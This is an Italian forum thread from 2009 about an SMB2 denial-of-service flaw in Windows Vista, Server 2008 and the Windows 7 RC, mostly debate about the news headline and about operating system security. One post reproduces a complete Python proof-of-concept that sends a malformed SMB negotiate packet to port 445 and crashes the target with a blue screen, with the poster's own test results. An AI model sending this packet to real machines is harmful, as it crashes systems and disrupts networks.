Windows 7, una falla ancor prima di salpare

[Curtis]

Quote:

Originariamente inviato da pabloski

è l'exploit a generare un bsod, ma non è detto che non ci sia il modo per usare la vulnerabilità per infettare le macchine

poi questo tipo di falla permette l'infezione tramite lan e lì non ci sono firewall che tengano, basta una macchina infettata e in 10 minuti ti ritrovi infettata l'intera rete.....un hacker può avere molto interesse in questo genere di cose, le informazioni sono la nuova moneta del mondo

comunque il problema è che purtroppo dipendiamo per moltissime cose da windows e questo è sbagliato, bisogna diversificare e no non è possibile che i bancomat usino windows ( del resto versioni che vanno da nt4 a 2000, quindi roba vecchia e non patchata )

in ogni caso il vero problema sono le vulnerabilità di cui si sa poco e i cui exploit vengono venduti sul mercato nero

si ok ma chi lavora ora con ad esempio 30 computer in lan e Win7 come Os di lavoro che non e' ancora uscito in final release ?

nessuno lavora con un Os RC.Quando WIn7 sara' uscito e la gente lo comprera' ed usera' per lavorare questa falla sara' risolta

[ally]

Quote:

Originariamente inviato da Sammy Jankis

Windows 7, una falla ancor prima di salpare........redattore sospeso per 3 gg per principio di flame

...quoto...inutile dire di voler combattere i flame quando si rilasciano titoli del genere...sarebbe ora di finirla...

...quotate se condividete...

...ciao Andrea...

[Pier de Notrix]

Raga, ma a nessuno di quelli che tra voi stanno testando Windows 7 è capitato che crashasse il sistema e al riavvio il desktop fosse scomparso?

[Wonder]

Allora la notizia doveva titolarsi:
"Trovata falla di sicurezza in Windows VIsta e Win 2008"
E poi nell'articolo dire che il problema c'è anceh su un prodotto ceh deve ancora uscire

però fa molto più scoop e genera moto trollismo titolare così. A volte mi chiedo con che testa mettano certi tiolo. Forse fanno apposta. Forse che i moderatori non abbiano nulla da fare?

[MaxArt]

Quote:

Originariamente inviato da M4rk191

forse il titolo influenza i vostri pareri, ma nella news c'è scritto che la falla è presente (come fatto notare per ben due volte da altri user) anche in Windows Vista, questo dimostra come non centri beta, alpha, pre-release, OS acerbo e quante altre motivazioni trovate.

Al di là della falla che si può trovare anche in Vista, hai fatto dei commenti che mancano di alcuni importanti presupposti "scientifici".
Il fatto è che non hai citato né fonti né dati di alcun tipo, hai solo detto "spannometricamente" che la maggior parte dei bug li trova gente esterna a Microsoft, dicendo che "è un dato di fatto" (sic). Ti si è già detto che questo è impossibile da verificare, quindi commenti del genere lasciano il tempo che trovano.
Nello specifico c'è in fondo da rallegrarsi, perché se un bug "da news" non fa altro che mostrare un BSOD, allora non siamo messi affatto male, anzi. E ci sono voluti 2 anni di Vista per trovare la falla, segno che non era affatto facile da ravvisare.
Se tutti gli altri OS avessero puntati addosso tutti gli occhi che ha Microsoft davvero non so quanto ne uscirebbero sicuri agli occhi della gente... ma non mi pronuncio. Solo, non facciamo passare la Microsoft per una manica di incompetenti.

[MaxArt]

Quote:

Originariamente inviato da ally

...quoto...inutile dire di voler combattere i flame quando si rilasciano titoli del genere...sarebbe ora di finirla...

...quotate se condividete...

Lungi da me mettermi in polemica con la redazione, ma in effetti una flame war con titoli del genere forse non è scontata, però mi pare almeno più facile.
Forse si sarebbe scatenata comunque, ma questo è un sito serio e possiamo fare a meno di titoli "attira-click". Probabilmente un titolo come "Bug in SMB2, BSOD per Windows 2008, Vista e Seven" non avrebbe attratto la stessa quantità di gente.

[Curtis]

Quote:

Originariamente inviato da M4rk191

le falle trovato vengono sempre comunicate, questo non è il caso. Inoltre basta vedere quanti virus ci sono per capire che i tester sono praticamente inesistenti.

Detto questo basta OT Non mi interessa farvi cambiare opinione su Windows, ne tantomeno mi interessa quale sia il miglior OS, ognuno usa l'OS che preferisce, questi flame lasciano il tempo che trovano.

quindi il fatto che hacker o criminali informatici compilino codice per sviluppare programmini con funzionalita' malevola ( trojan spyware,keylogger etc) per l'Os windows significa che Windows fa schifo?

No, significa che compilano software con funzionalita' malevola perche' hanno appunto interesse a compilare questo genere di software per Windows e non per Linux ad esempio che ha una percentuale di home user che lo usa ridicola dove quindi questi software avrebbero un impatto ridicolo .Il criminale o l'hacker agisce e sta addosso sempre all'Os su cui potrebbe poi ricavarne il maggior tornaconto .Sta poi a te non far installare questi software -baggianate sul sistema

mache te lo dico a fa'

[jgvnn]

Quote:

Originariamente inviato da M4rk191

siete fanboy.

Quote:

1-non acquisterei (leggi, utilizzerei) mai un prodotto MS

grazie dell'informazione! Utilissima, a tutta la community. Mettila in firma...

Quote:

2-venduto o non venduto è un dato di fatto che trovano più bug ricercatori esterni a MS che i tester pagati apposta

questa affermazione è suffragata da qualche argomentazione?

[eraser]

Quote:

Originariamente inviato da dovella

ok

Microsoft: Windows 7 not affected by latest flaw http://bit.ly/1vyz6I

Si appunto, fa piacere averlo scritto al secondo post e tutti l'hanno sorvolato

[theory]

Quote:

Originariamente inviato da M4rk191

le falle trovato vengono sempre comunicate, questo non è il caso.

Questo significa che questa falla non era stata ancora scovata, vuol dire che non sanno lavorare?

Quote:

Inoltre basta vedere quanti virus ci sono per capire che i tester sono praticamente inesistenti.

Se ci sono 5000 falle (numero a caso) e col beta testing ne vengono trovate e corrette 4500 (numero a caso), nei mesi successivi al rilascio i cracker potrebbero creare 500 virus per sfruttare le falle rimanenti (che verranno corrette dopo con le patch). Questo significa che i tester sono inesistenti (pur avendo scovato 4500 falle), visto che 500 virus non sono pochi?

[mail9000it]

Quote:

Originariamente inviato da Curtis

eccone un altro Microsoft te lo ha venduto WIN7 e come lo hai acquistato ti si e' presentata la falla? no , quindi meglio tacere parla da fine ottobre 2009

Curtis
Prima di tutto molti dei commenti hai quali hai risposto erano chiaramente ironici e non si capisce perchè tu abbia replicato con tanta violenza.

In secondo luogo forse sei tu che non sei ben informato e che deve moderare quello che scrive.
(mi riferisco ai primi post quelli successivi non li ho letti)

Sai che RTM sta per Release to manufacturing (Versione per la produzione)?
e che indica che è la versione FINALE del SO che viene inviato alle fonderie (non so il nome esatto) che masterizzano e inscatolano i CD per la vendita.

Sei al corrente che la RTM di Windows 7 è stata UFFICIALMENTE rilasciata da Microsoft ed è accessibile ai possessori di un account TechNet Plus e MSDN dal 14/08/2009.

Quindi test e commenti sulla RTM di Windows 7 sono perfettamente possibili ora senza dover aspettare il 22 Ottobre.

Ne consegue che qualunque patch o modifica successiva deve essere scaricata dal sito con Windows Update 30 secondi dopo aver installato il sistema operativo.
Una prassi normale al giorno d'oggi ma che francamente non mi piace.

Inoltre come già segnalato il bug in oggetto era presente anche in Vista e non occorre molto a controllare se su Win7RTM è presente un bug già visto e conosciuto su vista.

CIAO

[xsim]

Sono convinto che anche i tanto blasonati Linux e Mac OS X (che comunque considero SO di altissimo livello, così come Windows 7) avranno un'immensità di falle di sicurezza.
La differenza è che su Windows si concentrano tutti gli attacchi e l'attenzione generale per il semplice fatto che è il più diffuso.
L'importante comunque è la rapidità con la quale si rilasciano patch critiche.

[teodelux99]

perchè con microsoft i problemi si chiamano falle e le soluzioni alle falle per mac si chiamano novità?!?!?

[sniperspa]

mica tanto ancora prima di salpare...è salpato da mesi ormai...

Chiunque con scopi malevoli avrebbe avuto parecchio tempo per cercare falle...

[Sammy Jankis]

Quote:

Originariamente inviato da teodelux99

perchè con microsoft i problemi si chiamano falle e le soluzioni alle falle per mac si chiamano novità?!?!?

OT: Per lo stesso motivo per cui nei film e telefilm USA il mercato è così diviso: 70% Apple, 30% PC (esclusivamente DELL) FINE OT.

P.S. per sdrammatizzare......

[Simock85]

Ma avete dato un'occhiata allo script prima di dar fiato alle trombe?

Codice:

# SecurityReason Note :
# Tested on : Windows Vista SP2 full updated - US-en 
#
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" header field it dies with a 
# PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal operation should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" 
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" 
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" 
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" 
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" 
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" 
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

lo script (in python) invia una pacchetto di negoziazione a SMB del pc attaccato, l'header della stringa "Process Id High" contiene il carattere "&". Il driver SRV2.SYS interpreta l'"&" come un memory fault (che fisicamente non avviene), e se risiede nella nonpaged pool ecco l'inevitabile BSOD.

La mia prova, attacco effettuato da macOs 10.6, macchine attaccate:
1-notebook del coinquilino con Vista Business SP2, ovviamente condivisione attiva (impostato su rete domestica in centro connessioni), BSOD PAGE_FAULT_IN_NONPAGED_AREA e riavvio.
2-mio notebook con 7 professional RTM (MSDNAA), l'invio del "buff" non sortisce effetto alcuno, non crasha nemmeno il driver SRV2.SYS, eppure arriva tutto a destinazione in quanto non arrivano errori dalla libreria socket.

Quindi sono vulnerabili solo Vista e Server2008 (?? o forse no); peraltro non è una vulnerabilità grave in quanto il crash avviene all'arrivo dell'header del pacchetto e non si riesce ad iniettare codice nel corpo.
Il driver interpreta l'& nell'header come un page fault e arriva BSOD (quindi non viene creato un page fault, come avviene con la saturazione della nonpaged pool, ma ne viene semplicemente simulato l'effetto), antipatico ma innocuo, risolto in 7 probabilmente spostando il driver SRV2 nella paged pool (dedotto dal fatto che, nei miei test, 7 risulta vulnerabile se il pagefile viene disattivato); chiaramente è sensato aspettarsi una pezza al driver stesso.

[eraser]

Le versioni vulnerabili dei sistemi operativi, almeno stando ai primi test, le avevo scritte al secondo post Riguardo Windows 7, è vulnerabile solo la RC e non la RTM

[genesi86]

Non esiste un SO perfetto ed invulnerabile, xò esistono condizioni affinchè un SO sia + sicuro e - vulnerabile rispetto ad un altro SO. Purtroppo Windows essendo x ragioni commerciali un SO di tipo "close", ha solo tot selezionatissimi ing. ke sn autorizzati ad intervenire ed a kiudere le falle, quindi ci sono meno "occhi" ke vigilano e meno persone ke possono intervenire a correggere gli errori.

[Curtis]

[

Quote:

Originariamente inviato da mail9000it

Curtis
Prima di tutto molti dei commenti hai quali hai risposto erano chiaramente ironici e non si capisce perchè tu abbia replicato con tanta violenza.

In secondo luogo forse sei tu che non sei ben informato e che deve moderare quello che scrive.
(mi riferisco ai primi post quelli successivi non li ho letti)

Sai che RTM sta per Release to manufacturing (Versione per la produzione)?
e che indica che è la versione FINALE del SO che viene inviato alle fonderie (non so il nome esatto) che masterizzano e inscatolano i CD per la vendita.

Sei al corrente che la RTM di Windows 7 è stata UFFICIALMENTE rilasciata da Microsoft ed è accessibile ai possessori di un account TechNet Plus e MSDN dal 14/08/2009.

Quindi test e commenti sulla RTM di Windows 7 sono perfettamente possibili ora senza dover aspettare il 22 Ottobre.

Ne consegue che qualunque patch o modifica successiva deve essere scaricata dal sito con Windows Update 30 secondi dopo aver installato il sistema operativo.
Una prassi normale al giorno d'oggi ma che francamente non mi piace.

Inoltre come già segnalato il bug in oggetto era presente anche in Vista e non occorre molto a controllare se su Win7RTM è presente un bug già visto e conosciuto su vista.

CIAO

L'importante e' che quando uscira' la final release in vendita al pubblico e che la comprera' la falla sia corretta

Quote:

Originariamente inviato da teodelux99

perchè con microsoft i problemi si chiamano falle e le soluzioni alle falle per mac si chiamano novità?!?!?

perche' quando Apple rilascia un aggiornamento di sistema le cose che mette in risalto nelle news sui siti pubblici che motivano l'aggiornamento sono appunto gli aggiornamenti di stabilita' delle applicazioni ( strano perche' dovevano gia' essere stabili a sentire Apple ) mentre i security fix non vengono mai mostrati apposta per non far vedere di primo acchito le vulnerabilita' ai meno esperti che leggono le news e far cadere un mito

Se poi si va sul sito apple nella sezione Security issue ad ogni aggiornamento di OSx da ben 300MB circa ogni mese e mezzo si vede una lista di vulnerabilta' corrette che sembra un campo di battaglia

provare per credere

Quote:

Originariamente inviato da theory

Questo significa che questa falla non era stata ancora scovata, vuol dire che non sanno lavorare?

Se ci sono 5000 falle (numero a caso) e col beta testing ne vengono trovate e corrette 4500 (numero a caso), nei mesi successivi al rilascio i cracker potrebbero creare 500 virus per sfruttare le falle rimanenti (che verranno corrette dopo con le patch). Questo significa che i tester sono inesistenti (pur avendo scovato 4500 falle), visto che 500 virus non sono pochi?

Una falla di remote code execution ad esempio serve solo per essere sfruttata con apposito codice exploit per poi eventualmente far autoinstallare un malware
Una falla di questo tipo ha solo come fine il far autoinstallare malware di ogni genere sul sistema senza che l'utente ne sia al corrente ( poi come si sa prima che il malware effettivamente si installi deve passare anche il controllo dell'antivirus con la protezione permanente di sistema che lo blocca a priori )

Una falla di remote code execution ( le piu' gravi e che portano all'autoinstallazione di malware sul sistema) si sfrutta con codice exploit dedicato che il cracker crea apposta per sfruttare quella falla di memory corruption & remote arbitrary code execution e serve poi per far autoinstallare il malware , non e' un programmino malware che sfrutta la vulnerabilita', l'autoinstallazione di un programmino malware e' solo la conseguenza che porta lo sfruttamento di una tale vulnerabilita' con dedicato codice exploit

Ripeto

Confirmed: Windows 7 RTM not affected by reported zero-day flaw in SMB2. http://bit.ly/HHifR